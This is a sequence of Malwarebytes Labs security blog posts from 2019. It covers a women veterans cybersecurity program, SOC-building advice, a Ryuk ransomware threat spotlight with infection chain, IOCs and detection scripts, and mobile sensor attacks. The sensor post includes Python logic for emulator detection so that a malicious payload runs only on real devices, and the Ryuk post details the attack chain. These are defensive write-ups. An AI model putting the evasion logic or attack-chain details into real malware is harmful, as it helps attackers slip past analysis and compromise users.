Malware Bytes

New Women in CyberSecurity (WiCyS) veterans program aims to bridge skills gap, diversify sector

Malware Bytes Security - Fri, 12/13/2019 - 12:02pm

The cybersecurity industry has a problem: We have a zero percent unemployment rate. Or so we’re told.

With experts predicting millions of job openings in the years to come—coupled with the industry’s projected growth to US$289.9 billion by 2026 and soaring cyberattacks against businesses—now is as good a time as any for organizations to face the alleged skills shortage and take action.

Because here’s the unspoken reality: Organizations may have problems filling IT roles, but it’s not for lack of available employees. Perhaps it’s simply a problem of overlooking the millions of applicants with transferable skills. That’s where Women in CyberSecurity aims to step in.

Women in CyberSecurity launches veterans program

Women in CyberSecurity (WiCyS), a not-for-profit organization, launched the Veteran’s Assistance Program this November with the goal of connecting female veterans to jobs in the cybersecurity industry and providing a support network for its members. The program aims to:

  • Eliminate barriers that may hinder a veteran job candidate from being employed
  • Grow the cybersecurity workforce by introducing more women into cybersecurity
  • Help female veterans navigate into the cybersecurity industry as they transition and re-adjust to civilian life
  • Offer female vets the opportunity, community support, and resources to launch a career and thrive in the field

Women in CyberSecurity isn’t the first or only organization to look to military veterans to help fill vacant positions in cybersecurity. Palo Alto Networks recently launched a free cybersecurity training and certification initiative called Second Watch. The SANS Institute also opened the scholarship-based SANS CyberTalent VetSuccess Immersion Academy. Even Facebook partnered with CodePath.org and hundreds of students and professors last year to unveil the Facebook Cybersecurity University for Veterans, from which 33 veterans graduated.

But what sets the WiCyS Veteran’s Assistance Program apart is its intentionality and focus in bringing more female veterans into the fold. Although WiCyS doesn’t conduct cybersecurity training itself, it offers resources and more: professional development, career training, mentorship, and a dedicated support system that will be there for its members in the long run.

“We want to provide a community of sisterhood that understands what their challenges and needs are and match them to employers who also understand their needs and transferable skills,” says Dr. Amelia Estwick, founding member and vice president of the WiCyS Mid-Atlantic Affiliate.

WiCyS members who are female veterans are given an opportunity to receive a Veterans Fellowship Award, provided they are eligible.

The award, sponsored by Craig Newmark Philanthropies, is exclusively for female veterans who (1) are interested in making a career in cybersecurity or (2) are already in it but would like to further advance their careers.

Applications for the award are still open until Sunday, December 15. Eligible candidates will start receiving notifications from December 22 onward.

The WiCyS Veteran Fellowship Award will be provided to selected eligible female veterans who are interested in or already working in cybersecurity. Applications are open until December 15. Visit https://t.co/GaL6Y7eJrq for more information! pic.twitter.com/qlbrebsWdO

— Women in CyberSecurity (@WiCySorg) November 15, 2019

This hard task of shifting

Although transition programs are set up to help military members rejoin the workforce, finding a job hasn’t been easy for most of them, even with their highly specialized, STEM-related training and cybersecurity’s dire need for diverse, skilled workers. This frustrates Estwick, who is herself a US Army veteran working in cybersecurity as program manager of the National Cybersecurity Institute at Excelsior College.

“I kept hearing these numbers about lack of talent, and lack of diversity, and the skills gap, and I said, ‘Why do they keep saying these jobs aren’t filled when I talk to a lot of military women transitioning who say they can’t find a job?'” she recounts. “They have transferable skills that they’ve gained through the service. There’s no way in the world these women should have trouble finding jobs.”

Many veterans already working in cybersecurity say the industry is the best fit yet for those who served in the armed forces. The overlap of cybersecurity and military terminology and tactics alone merits this hand-in-glove relationship.

Not only are veterans armed with STEM-related knowledge and technical aptitude, Estwick asserts, they have also dealt with many of the same issues in privacy, compliance, and regulation we in cybersecurity deal with today. Furthermore, she says, they have more developed soft skills, such as teamwork, leadership, attention to detail, and communication—key skills they have carried with them from their time in the service.

An honorary salute

In our eyes, veterans are and will always be defenders and heroes. It shouldn’t surprise us to see them on the front lines of the digital world as well. For WiCyS, putting highly skilled female veterans in view of organizations looking to fill in-demand positions is just the beginning.

“We’re dealing with female veterans, but eventually, we could add military spouses or other groups. There are so many other slices of the pie we want to add. But we need to identify what their needs are now. The more we have joining us, the better informed we are to address those needs,” says Estwick.

While transitioning to civilian life is a challenge to all former military members, female veterans in particular shouldn’t be bogged down by employment barriers—real and perceived—when planning to make a career in cybersecurity and grow in it.

“There’s this nasty fog over cybersecurity. You get a lot of women who feel they’re not technical enough, not good enough for the field. It’s a change of mindset,” Estwick counsels. “Don’t diminish yourself. You have extremely valuable talent, knowledge, skill, and ability that employers should be very proud to have.”

The post New Women in CyberSecurity (WiCyS) veterans program aims to bridge skills gap, diversify sector appeared first on Malwarebytes Labs.

Categories: Malware Bytes

5 tips for building an effective security operations center (SOC)

Malware Bytes Security - Fri, 12/13/2019 - 11:00am

Security is more than just tools and processes. It is also the people that develop and operate security systems. Creating systems in which security professionals can work efficiently and effectively with current technologies is key to keeping your data and networks secure. Many enterprise organizations understand this need and are attempting to meet it with the creation of their own security operations center (SOC).

SOCs can significantly improve the security of an organization, but they are not perfect solutions and can be challenging to implement. Lack of skilled staff and the absence of effective orchestration and automation are the biggest hurdles, according to a recent SANS survey. Despite these hurdles, more organizations are looking to follow in the footsteps of the enterprise and build SOCs. Read on to learn exactly what a security operations center is, and how to create an effective one.

What is a security operations center (SOC)?

A security operations center, or SOC, consists of a team of people who are responsible for monitoring systems, identifying security issues and incidents, and responding to events. They are also typically the ones responsible for evaluating and enforcing security policies. A SOC team is typically responsible for covering the whole organization, not just a single department. While SOCs have mostly been embraced by larger organizations, they are useful for businesses of any size, since all organizations are vulnerable to cyberattack.

SOC team members typically include:

  • SOC Manager—leads team operations and helps determine budget and agenda. They also serve as team representatives, interacting with other managers and executives.
  • Security Analyst—organizes and interprets data from reports and audits. They conduct risk assessments and use threat intelligence to produce actionable insights.
  • Forensic Investigator—analyzes incident data for evidence and behavioral information. They can work with law enforcement post incident.
  • Incident Responder—creates and follows Incident Response Plans (IRPs). They also conduct initial investigations and threat assessments.
  • Compliance Auditor—ensures processes comply with regulations. They can also handle compliance reporting.

SOCs must be customizable to an organization’s needs. To meet these differing needs, several types of SOCs exist, including:

  • Internal—consists of in-house security professionals
  • Co-managed—consists of a combination of internal and third-party professionals
  • Managed—consists of third-party professionals working remotely
  • Command—manages and coordinates smaller SOCs; useful for large enterprises

How to build an effective SOC

Building an effective SOC requires understanding the needs of your organization, as well as its limitations. Once these needs and limitations are understood, you can begin applying the following best practices. 

1. Choose your team carefully

The effectiveness of your SOC is reliant on the team members you choose. They are responsible for keeping your systems secure and determining which resources are needed to do so. When choosing, you need to include members that cover a range of skill sets and expertise.

Team members must be able to:

  • Monitor systems and manage alerts
  • Manage and resolve incidents
  • Analyze incidents and propose action
  • Hunt and detect threats 

To accomplish these tasks, team members must also have a variety of skills, both soft and hard. The most important among these include intrusion detection, reverse engineering, malware handling and identification, and crisis management.

Do not make the mistake of only evaluating technical skills when building your team. Team members are required to work together closely during high-stress situations. For this reason, it is important to select members who can effectively collaborate and communicate.

2. Increase visibility

Visibility is key to being able to successfully protect a system. Your SOC team needs to be aware of where data and systems are in order to protect them. They need to know the priority of data and systems, as well as who should be allowed access.

Being able to appropriately prioritize your assets enables your SOC to effectively distribute its limited time and resources. Having clear visibility allows your SOC to easily spot attackers and limits places where attackers can hide. To be maximally effective, your SOC must be able to monitor your network and perform vulnerability scans 24/7.

3. Select tools wisely

Having ineffective or insufficient tools can seriously hinder the effectiveness of your SOC. To avoid this, select tools carefully to match your system needs and infrastructure. The more complex your environment is, the more important it is to have centralized tools. Your team should not have to piece together information for analysis or use a different tool to manage each device.

The more discrete tools your SOC employs, the more likely information is to be overlooked or ignored. If security members need to access multiple dashboards or pull logs from multiple sources, information is more difficult to sort through and correlate. 

When selecting tools, make sure to evaluate and research each tool prior to selection. Security products can be incredibly expensive and difficult to configure. It doesn’t make sense to spend time or money on a product or service that doesn’t integrate well with your system.

When deciding which tools to incorporate, you need to consider endpoint protection, firewalls, automated application security, and monitoring solutions. Many SOCs make use of Security Information and Event Management (SIEM) solutions. These tools can provide log management and increase security visibility. SIEM can also be helpful for correlating data between events and automating alerts.
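To make the correlation idea concrete, here is a minimal sketch of the kind of rule a SIEM automates: flagging a user who fails to log in repeatedly, across different log sources, within a short window. The event schema here is invented for illustration; real SIEMs use their own normalized formats.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Toy events as a SIEM might normalize them from different log sources.
# The field names are illustrative, not any specific product's schema.
events = [
    {"time": datetime(2019, 12, 13, 9, 0, 5),  "source": "vpn",       "user": "jdoe", "action": "login_failed"},
    {"time": datetime(2019, 12, 13, 9, 0, 40), "source": "vpn",       "user": "jdoe", "action": "login_failed"},
    {"time": datetime(2019, 12, 13, 9, 1, 10), "source": "ad",        "user": "jdoe", "action": "login_failed"},
    {"time": datetime(2019, 12, 13, 9, 2, 0),  "source": "fileshare", "user": "jdoe", "action": "login_success"},
]

def correlate_failed_logins(events, threshold=3, window=timedelta(minutes=5)):
    """Alert when one user fails to log in `threshold` times, across
    any sources, within `window` -- a classic SIEM correlation rule."""
    failures = defaultdict(list)
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["action"] != "login_failed":
            continue
        bucket = failures[ev["user"]]
        bucket.append(ev["time"])
        # Keep only failures inside the sliding window.
        bucket[:] = [t for t in bucket if ev["time"] - t <= window]
        if len(bucket) >= threshold:
            alerts.append((ev["user"], ev["time"]))
    return alerts

print(correlate_failed_logins(events))  # one alert, fired at the third failure
```

The value of doing this centrally is exactly the point made above: the VPN and Active Directory logs individually look unremarkable; only when pulled into one place does the pattern cross the threshold.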

4. Develop a robust incident response plan (IRP)

An IRP is a plan that outlines a standardized way of detecting and responding to security incidents. It should incorporate system knowledge, like data priority, as well as existing security policies and processes. A well-crafted IRP enables faster detection and resolution of incidents. There are many templates and guides available to help you create an incident response plan. Using these resources can ensure that no aspects are missed in your plan. It can also speed up the creation process.

Once your plan is established, it is not enough to simply wait until an incident occurs. Your SOC should make sure to practice using the plan with incident drills. Doing so can increase their response confidence when a real incident arises. It can also uncover any flaws, inconsistencies, or inefficiencies in the plan. It is the SOC team’s responsibility to make sure that your IRP is kept up to date as systems, staff, and security processes change.

5. Consider adding managed service providers (MSPs)

Many organizations use managed service providers (MSPs) as part of their SOC strategy. Managed services can provide the expertise that is otherwise lacking in your team. These services can also ensure that your systems are continuously monitored and that all events have an immediate response. Unless you have multiple shifts covering your SOC, constant coverage is something you are unlikely to be able to accomplish on your own.

The most common uses of managed SOC services are penetration testing and threat research. These are time-consuming tasks that can require significant expertise and expensive tools. Rather than devoting limited time and budget to these tasks, your SOC can benefit from outsourcing them or collaborating with third-party teams.

Securing organizations with SOCs

Creating a security operations center can be daunting. After all, it is meant to be the first and last stop when it comes to system security. Despite this, you can create an effective SOC team that meets the unique needs of your organization. It takes time, effort, and careful assessment, but the reward is a confidently secure network. 

Start by using the best practices outlined here and pay special attention to team selection. The members you choose not only dictate the SOC processes and tools to be implemented, but ultimately, the overall effectiveness of your program.


Threat spotlight: The curious case of Ryuk ransomware

Malware Bytes Security - Thu, 12/12/2019 - 5:33pm

Ryuk. A name once unique to a fictional character in a popular Japanese comic book and cartoon series is now a name that appears in several rosters of the nastiest ransomware to ever grace the wild web.

For an incredibly young strain—only 15 months old—gaining such notoriety is quite a feat for Ryuk ransomware. Unless the threat actors behind its campaigns call it quits (remember GandCrab?) or law enforcement collars them for good, we can only expect the threat of Ryuk to loom large over organizations.

First discovered in mid-August 2018, Ryuk immediately turned heads after disrupting operations of all Tribune Publishing newspapers over the Christmas holiday that year. What was initially thought to be a server outage soon proved to those affected to be a malware attack. The infection was eventually quarantined; however, Ryuk re-infected and spread to connected systems on the network because security patches failed to hold when tech teams brought the servers back up.

Big game hunting with Ryuk ransomware

Before the holiday attack on Tribune Publishing, Ryuk had been seen targeting various enterprise organizations worldwide, demanding ransom payments ranging from 15 to 50 Bitcoins (BTC). That translates to between US$97,000 and $320,000 at the time of valuation.

This method of exclusively targeting large organizations with critical assets that almost always guarantees a high ROI for criminals is called “big game hunting.” It’s not easy to pull off, as such targeted attacks also involve the customization of campaigns to best suit targets and, in turn, increase the likelihood of their effectiveness. This requires much more work than a simple “spray-and-pray” approach that can capture numerous targets but may not net such lucrative results.

For threat actors engaged in big game hunting, malicious campaigns are launched in phases. For example, they may start with a phishing attack to gather key credentials or drop malware within an organization’s network to do extensive mapping, identifying crucial assets to target. Then they might deploy second and third phases of attacks for extended espionage, extortion, and eventual ransom.

To date, Ryuk ransomware is hailed as the costliest among its peers. According to a report by Coveware, a first-of-its-kind incident response company specializing in ransomware, Ryuk’s asking price is 10 times the average, yet the firm also notes that ransoms are highly negotiable. The varying ways adversaries work out ransom payments suggest that more than one criminal group may have access to and be operating Ryuk ransomware.

The who behind Ryuk

Accurately pinpointing the origin of an attack or malware strain is crucial, as it reveals as much about the threat actors behind attack campaigns as it does the payload itself. The name “Ryuk,” which has obvious Japanese ties, is not a factor to consider when trying to discover who developed this ransomware. After all, it’s common practice for cybercriminals to use handles based on favorite anime and manga characters. These days, a malware strain is more than its name.

Instead, similarities in code base, structure, attack vectors, and languages can point to relations between criminal groups and their malware families. Security researchers from Check Point found a connection between the Ryuk and Hermes ransomware strains early on due to similarities in their code and structure, an association that persists up to this day. Because of this, many have assumed that Ryuk may also have ties with the Lazarus Group, the same North Korean APT group that operated the Hermes ransomware in the past.

Recommended read: Hermes ransomware distributed to South Koreans via recent Flash zero-day

However, code likeness alone is insufficient basis to support the Ryuk/North Korean ties narrative. Hermes is a ransomware kit that is frequently peddled on the underground market, making it available for other cybercriminals to use in their attack campaigns. Furthermore, separate research from cybersecurity experts at CrowdStrike, FireEye, Kryptos Logic, and McAfee has indicated that the gang behind Ryuk may actually be of Russian origin—and not necessarily nation-state sponsored.

As of this writing, the origins of Ryuk ransomware can be attributed (with high confidence, per some of our cybersecurity peers) to two criminal entities: Wizard Spider and CryptoTech.

The former is the well-known Russian cybercriminal group and operator of TrickBot; the latter is a Russian-speaking organization found selling Hermes 2.1 two months before the $58.5 million cyber heist that victimized the Far Eastern International Bank (FEIB) in Taiwan. According to reports, this version of Hermes was used as a decoy or “pseudo-ransomware,” a mere distraction from the real goal of the attack.

Wizard Spider

Recent findings have revealed that Wizard Spider upgraded Ryuk to include a Wake-on-LAN (WoL) utility and an ARP ping scanner in its arsenal. WoL is a network standard that allows computing devices connected to a network—regardless of which operating system they run—to be turned on remotely whenever they’re turned off, in sleep mode, or hibernating.

ARP pinging, on the other hand, is a way of discovering which endpoints in a LAN are online. According to CrowdStrike, these new additions reveal Wizard Spider’s attempts to reach and infect as many of their targets’ endpoints as they can, demonstrating a persistent focus and motivation to increasingly monetize their victims’ encrypted data.
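The WoL mechanism Wizard Spider abuses is itself trivial: a "magic packet" is just 6 bytes of 0xFF followed by the target MAC address repeated 16 times, broadcast over UDP. A minimal illustrative sketch (any NIC with WoL enabled will power its host on when it sees its own MAC in such a packet):

```python
import socket

def wol_magic_packet(mac: str) -> bytes:
    """Build a Wake-on-LAN 'magic packet': 6 bytes of 0xFF followed by
    the target MAC address repeated 16 times (102 bytes total)."""
    mac_bytes = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    if len(mac_bytes) != 6:
        raise ValueError("MAC address must be 6 bytes")
    return b"\xff" * 6 + mac_bytes * 16

def wake(mac: str, broadcast: str = "255.255.255.255", port: int = 9) -> None:
    """Broadcast the packet on the LAN; the machine with that MAC powers on."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        s.sendto(wol_magic_packet(mac), (broadcast, port))

pkt = wol_magic_packet("00:11:22:33:44:55")
print(len(pkt))  # 102
```

That a legitimate administration convenience is this easy to script is precisely why its presence in a ransomware toolkit matters: sleeping endpoints are no longer out of reach.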

CryptoTech

Two months ago, Gabriela Nicolao (@rove4ever) and Luciano Martins (@clucianomartins), both researchers at Deloitte Argentina, attributed Ryuk ransomware to CryptoTech, a little-known cybercriminal group that was observed touting Hermes 2.1 in an underground forum back in August 2017. Hermes 2.1, the researchers say, is Ryuk ransomware.

The CryptoTech post about Hermes version 2.1 on the dark web in August 2017 (Courtesy of McAfee)

In a Virus Bulletin conference paper and presentation entitled Shinigami’s revenge: the long tail of the Ryuk ransomware, Nicolao and Martins presented evidence for this claim: In June 2018, a couple of months before Ryuk made its first public appearance, an underground forum poster expressed doubt that CryptoTech was the author of Hermes 2.1, the ransomware toolkit it had been peddling for almost a year by that time. CryptoTech’s response, which Nicolao and Martins captured and annotated in the screenshot below, was interesting.

CryptoTech: Yes, we developed Hermes from scratch.

The Deloitte researchers also noted that after Ryuk emerged, CryptoTech went quiet.

CrowdStrike has estimated that from the time Ryuk was deployed until January of this year, its operators netted a total of 705.80 BTC, equivalent to US$5 million as of press time.

Ryuk ransomware infection vectors

There was a time when Ryuk ransomware arrived on clean systems to wreak havoc. But new strains observed in the wild now belong to a multi-attack campaign that involves Emotet and TrickBot. As such, Ryuk variants arrive on systems pre-infected with other malware—a “triple threat” attack methodology.

How the Emotet, TrickBot, and Ryuk triple threat attack works (Courtesy of Cybereason)

The first stage of the attack starts with a weaponized Microsoft Office document file—meaning, it contains malicious macro code—attached to a phishing email. Once the user opens it, the malicious macro will run cmd and execute a PowerShell command. This command attempts to download Emotet.
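Because the chain begins with a macro-bearing Office document, one crude defensive triage step is to check whether an incoming file even contains a VBA project. The sketch below is a heuristic only (dedicated tools such as olevba go much deeper, and legacy OLE formats need different parsing); it relies on the fact that modern Office files are ZIP containers that store macro code in a vbaProject.bin part:

```python
import zipfile

def has_vba_macros(path: str) -> bool:
    """Crude mail-gateway-style triage: modern Office files (.docm,
    .xlsm, etc.) are ZIP containers, and VBA macro code lives in a
    vbaProject.bin part. Presence of that part is a quick first filter,
    not proof of malice."""
    if not zipfile.is_zipfile(path):
        return False  # legacy OLE2 formats require different parsing
    with zipfile.ZipFile(path) as z:
        return any(name.lower().endswith("vbaproject.bin") for name in z.namelist())
```

Paired with the attachment-filtering and macro-disabling advice later in this post, even a check this simple shrinks the attack surface the first stage depends on.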

Once Emotet executes, it retrieves and executes another malicious payload—usually TrickBot—and collects information on affected systems. It initiates the download and execution of TrickBot by reaching out to and downloading from a pre-configured remote malicious host.

Once infected with TrickBot, the threat actors then check if the system is part of a sector they are targeting. If so, they download an additional payload and use the admin credentials stolen using TrickBot to perform lateral movement to reach the assets they wish to infect.

The threat actors then check for and establish a connection with the target’s live servers via a remote desktop protocol (RDP). From there, they drop Ryuk.

Systems infected with Ryuk ransomware display the following symptoms:

Presence of ransom notes. Ryuk drops the ransom note, RyukReadMe.html or RyukReadMe.txt, in every folder where it has encrypted files.

The HTML file, as you can see from the screenshot above, contains two private email addresses that affected parties can use to contact the threat actors, either to find out how much they need to pay to get access back to their encrypted files or to start the negotiation process.

On the other hand, the TXT ransom note contains (1) explicit instructions for affected parties to read and comply with, (2) two private email addresses affected parties can contact, and (3) a Bitcoin wallet address. Although email addresses may vary, it was noted that they are all accounts hosted at Protonmail or Tutanota. It was also noted that a day after the unsealing of an indictment against two ransomware operators, Ryuk operators removed the Bitcoin address from their ransom notes, stating that it would be provided once affected parties made contact via email.

There are usually two versions of the text ransom note: a polite version, which past research claims is comparable to BitPaymer’s due to certain similar phrasings; and a not-so-polite version.

Ryuk ransom notes. Left: polite version; Right: not-so-polite version
BitPaymer ransom note: polite version (Courtesy of Coveware)
BitPaymer ransom note: not-so-polite version (Courtesy of Symantec)

Encrypted files with the RYK string appended to extension names. Ryuk uses a combination of symmetric (AES) and asymmetric (RSA) encryption to encode files. A private key, which only the threat actor can supply, is needed to properly decrypt files.

Encrypted files will have the .ryk extension appended to their file names. For example, encrypted sample.pdf and sample.mp4 files will be renamed sample.pdf.ryk and sample.mp4.ryk, respectively.

This scheme is effective, assuming that each Ryuk strain was tailor-made for its target organization.

While Ryuk encrypts files on affected systems, it avoids files with the extensions .exe, .dll, and .hrmlog (a file type associated with Hermes). Ryuk also avoids encrypting files in the following folders:

  • AhnLab
  • Chrome
  • Microsoft
  • Mozilla
  • Recycle.bin
  • Windows
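For responders, the symptoms described above (dropped RyukReadMe notes and files renamed with a .ryk extension) lend themselves to a quick filesystem sweep. The sketch below is illustrative only and no substitute for proper incident response tooling:

```python
import os

# Note file names taken from the symptoms described in this post.
RANSOM_NOTES = {"ryukreadme.html", "ryukreadme.txt"}

def sweep_for_ryuk(root: str):
    """Walk a directory tree and report the two Ryuk symptoms discussed
    above: dropped RyukReadMe notes and files renamed with .ryk."""
    hits = {"notes": [], "encrypted": []}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if name.lower() in RANSOM_NOTES:
                hits["notes"].append(path)
            elif name.lower().endswith(".ryk"):
                hits["encrypted"].append(path)
    return hits
```

Run against a suspect share, the result gives a fast first estimate of how far the encryption spread before containment.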
Protect your system from Ryuk

Malwarebytes continues to track Ryuk ransomware campaigns, protecting our business users with real-time anti-malware and anti-ransomware technology, as well as signature-less detection, which stops the attack earlier on in the chain. In addition, we protect against triple threat attacks aimed at delivering Ryuk as a final payload by blocking downloads of Emotet or TrickBot.

We recommend IT administrators take the following actions to secure and mitigate against Ryuk ransomware attacks:

  • Educate every employee in the organization, including executives, on how to correctly handle suspicious emails.
  • Limit the use of privileged accounts to only a select few in the organization.
  • Avoid using RDP without properly terminating sessions.
  • Implement the use of a password manager and single sign-on services for company-related accounts. Do away with other insecure password management practices.
  • Deploy an authentication process that works for the company.
  • Disable unnecessary share folders, so that in the event of a Ryuk ransomware attack, the malware is prevented from moving laterally in the network.
  • Make sure that all software installed on endpoints and servers is up to date and all vulnerabilities are patched. Pay particular attention to patching CVE-2017-0144, a remote code execution vulnerability in SMBv1. This will prevent TrickBot and other malware exploiting this weakness from spreading.
  • Apply attachment filtering to email messages.
  • Disable macros across the environment.

For a list of technologies and operations that have been found to be effective against Ryuk ransomware attacks, you can go here.

Indicators of Compromise (IOCs)

Take note that professional cybercriminals sell Ryuk to other criminals on the black market as a toolkit for threat actors to build their own strain of the ransomware. As such, one shouldn’t be surprised by the number of Ryuk variants that are wreaking havoc in the wild. Below is a list of file hashes that we have seen so far:

  • cb0c1248d3899358a375888bb4e8f3fe
  • d4a7c85f23438de8ebb5f8d6e04e55fc
  • 3895a370b0c69c7e23ebb5ca1598525d
  • 567407d941d99abeff20a1b836570d30
  • c0d6a263181a04e9039df3372afb8016
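The hashes above are MD5-length, so a basic triage script can hash suspect files and check them against the list. A minimal sketch follows; keep in mind that hash matching only catches known samples, which, given that Ryuk is sold as a toolkit and varied by its buyers, is a real limitation:

```python
import hashlib

# The MD5 hashes listed in this post.
IOC_HASHES = {
    "cb0c1248d3899358a375888bb4e8f3fe",
    "d4a7c85f23438de8ebb5f8d6e04e55fc",
    "3895a370b0c69c7e23ebb5ca1598525d",
    "567407d941d99abeff20a1b836570d30",
    "c0d6a263181a04e9039df3372afb8016",
}

def md5_of(path: str, chunk: int = 1 << 20) -> str:
    """Hash a file in chunks so large binaries don't exhaust memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()

def matches_ioc(path: str) -> bool:
    return md5_of(path) in IOC_HASHES
```

Feeding an endpoint inventory through `matches_ioc` is a quick retrospective check, best treated as one signal among many rather than a verdict.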

As always—stay safe, everyone!


The little-known ways mobile device sensors can be exploited by cybercriminals

Malware Bytes Security - Wed, 12/11/2019 - 12:51pm

The bevy of mobile device sensors in modern smartphones and tablets makes them more akin to pocket-sized laboratories and media studios than mere communication devices. Cameras, microphones, accelerometers, and gyroscopes give incredible flexibility to app developers and utility to mobile device users. But this variety of inputs also gives clever hackers new methods of bypassing conventional mobile security—or even collecting sensitive information outside of the device.

Anyone who is serious about security and privacy, both for themselves and for end users, should consider how these sensors create unique vulnerabilities and can be exploited by cybercriminals.

Hackers of every hat color have been exploiting mobile device sensors for years. In 2012, researchers developed malware called PlaceRaider, which used Android sensors to develop a 3D map of a user’s physical environment. In 2017, researchers used a smart algorithm to unlock a variety of Android smartphones with near-complete success within three attempts, even when the phones had fairly robust security defenses.

But as updates have been released with patches for the most serious vulnerabilities, hackers in 2019 have responded by finding even more creative ways to use sensors to snag vulnerable data.

“Listening” to passwords

Researchers were able to learn passwords by analyzing audio captured by a mobile device’s microphone. The Cambridge University and Linköping University researchers created an artificial intelligence (AI) algorithm that analyzed the sounds of typing. In tests involving 45 people, the attack recovered 7 of 27 passwords entered on smartphones within 10 attempts; on tablets, it performed even better, recovering 19 of 27.

“We showed that the attack can successfully recover PIN codes, individual letters, and whole words,” the researchers wrote. Consider how easily most mobile users grant permission for an app to access their device’s microphone, without considering the possibility that the sound of their tapping on the screen could be used to decipher passwords or other phrases.

While this type of attack has never happened in the wild, it’s a reminder for users to be extra cautious when allowing applications access to their mobile device’s mic—especially if there’s no clear need for the app’s functionality.

Eavesdropping without a microphone

Other analysts have discovered that hackers don’t need access to a device’s microphone in order to tap into audio. Researchers working at the University of Alabama at Birmingham and Rutgers University eavesdropped on audio played through an Android device’s speakerphone with just the accelerometer, the sensor used to detect the orientation of the device. They found that sufficiently loud audio can impact the accelerometer, leaking sensitive information about speech patterns.

The researchers dubbed this capability “spearphone eavesdropping,” stating that threat actors could determine the gender, identity, or even some of the words spoken by the device owner using methods of speech recognition or reconstruction. Because accelerometers are always on and don’t require permissions to operate, malicious apps could record accelerometer data and reconstruct the audio using speech recognition software.

While an interesting attack vector that would be difficult to protect against—restricting access or usage of accelerometer features would severely limit the usability of smart devices—this vulnerability would require that cybercriminals develop a malicious app and persuade users to download it. Once on a user’s device, it would make much more sense to drop other forms of malware or request access to a microphone to pull easy-to-read/listen-to data.

Since modern-day users tend to pay little attention to permissions notices or EULAs, the advantage of permission-less access to the accelerometer doesn’t yet provide enough return on investment for criminals. However, we once again see how access to mobile device sensors for one functionality can be abused for other purposes.

Fingerprinting devices with sensors

In May, UK researchers announced they had developed a fingerprinting technique, called SensorID, that can track mobile devices across the Internet using easily obtained factory-set sensor calibration details. The attack reads calibration data from the accelerometer, gyroscope, and magnetometer sensors to build an identifier that follows a user’s web-browsing habits. Because the calibration data never changes, it can also be used to track users as they switch between browsers and third-party apps, hypothetically allowing someone to build a full view of what users are doing on their devices.
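
The gist can be sketched as follows. This is a hypothetical simplification, not SensorID’s actual algorithm: estimate each axis’s factory calibration offset from at-rest readings, quantize it, and hash the result into a stable identifier that survives across sessions.

```python
import hashlib

def estimate_bias(readings, expected):
    """Estimate a sensor axis's calibration offset as the difference
    between the mean at-rest reading and the ideal physical value."""
    return sum(readings) / len(readings) - expected

def fingerprint(axis_readings, expected_values, precision=3):
    """Hash quantized per-axis offsets into a device ID. The axis layout,
    precision, and hashing scheme are illustrative choices, not the
    researchers' actual method."""
    offsets = [
        round(estimate_bias(r, e), precision)
        for r, e in zip(axis_readings, expected_values)
    ]
    return hashlib.sha256(repr(offsets).encode()).hexdigest()[:16]
```

The key property is that two measurement sessions on the same device, with different noise, quantize to the same offsets and thus the same ID—no cookies or permissions required.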

Apple patched the vulnerability in iOS 12.2, while Google has yet to patch the issue in Android.

Avoiding detection with the accelerometer 

Earlier this year, Trend Micro uncovered two malicious apps on Google Play that drop wide-reaching banking malware. The apps appeared to be basic tools called Currency Converter and BatterySaverMobi. These apps cleverly used motion sensors to avoid being spotted as malware. 

A device that generates no motion sensor information is likely an emulator or sandbox environment used by researchers to detect malware. However, a device that does generate motion sensor data tells threat actors that it’s a true, user-owned device. So the malicious code only runs when the device is in motion, helping it sneak past researchers who might try to detect the malware in virtual environments.
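
The evasion check boils down to a few lines. This is a hypothetical reconstruction of the logic described above—the threshold and structure are illustrative, not decompiled from the actual apps:

```python
def looks_like_emulator(accel_samples, min_variance=1e-6):
    """A real handheld device jitters constantly, so a flat-lined
    accelerometer stream suggests a sandbox or emulator. The variance
    threshold is an illustrative guess."""
    mean = sum(accel_samples) / len(accel_samples)
    variance = sum((s - mean) ** 2 for s in accel_samples) / len(accel_samples)
    return variance < min_variance

def should_run_payload(accel_samples):
    """The dropper only proceeds on devices showing genuine motion,
    sidestepping automated analysis environments."""
    return not looks_like_emulator(accel_samples)
```

Researchers counter this by feeding recorded or synthetic sensor noise into their analysis environments, which is exactly the arms race the paragraph above describes.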

While the apps were taken down from Google Play, this evasive technique could easily be incorporated into other malicious apps on third-party platforms.

The mobile security challenges of the future

Mobile device sensors are especially vulnerable to abuse because no special permissions or escalations are required to access these sensors. 

Most end users are capable of using strong passwords and protecting their device with anti-malware software. However, they probably don’t think twice about how their device’s gyroscope is being used. 

The good news is that mobile OS developers are working to add security protections to sensors. Android Pie tightened security by limiting sensor and user input data. Apps running in the background on a device running Android Pie can’t access the microphone or camera. Additionally, sensors that use the continuous reporting mode, such as accelerometers and gyroscopes, don’t receive events.

This means that the mobile security challenges of the future won’t be solved with traditional cryptographic techniques alone. As long as hackers are able to access sensors that detect and measure physical space, they’ll continue to exploit that easy-to-access data to obtain the sensitive information they want.

As mobile devices expand their toolbox of sensors, they will create new vulnerabilities, along with yet-to-be-discovered challenges for security professionals.

The post The little-known ways mobile device sensors can be exploited by cybercriminals appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Hundreds of counterfeit online shoe stores injected with credit card skimmer

Malware Bytes Security - Tue, 12/10/2019 - 12:30pm

There’s a well-worn saying in security: “If it’s too good to be true, then it probably isn’t.” This can easily be applied to the myriad of online stores that sell counterfeit goods—and now attract secondary fraud in the form of a credit card skimmer.

Allured by great deals on brand names, many people end up buying products on dubious websites only to find out that what they paid for isn’t what they’re getting.

We recently identified a credit card skimmer injected into hundreds of fraudulent sites selling brand name shoes. Unfortunate shoppers may not only be disappointed with the faux merchandise, but they will also relinquish their personal and financial data to Magecart fraudsters.

Counterfeit shoes by the truckload

Think of the web as a never-ending whack-a-mole war between brands, security teams, and fraudsters—as legitimate companies work with security to take down one counterfeit site, another soon pops up.

One way fraudulent sites receive traffic is via forum spam. Crooks troll sporting and fitness forums and leave messages to entice users to visit the fake store:

Here’s that same counterfeit site selling Adidas, Nike, and other big brand name sneakers:

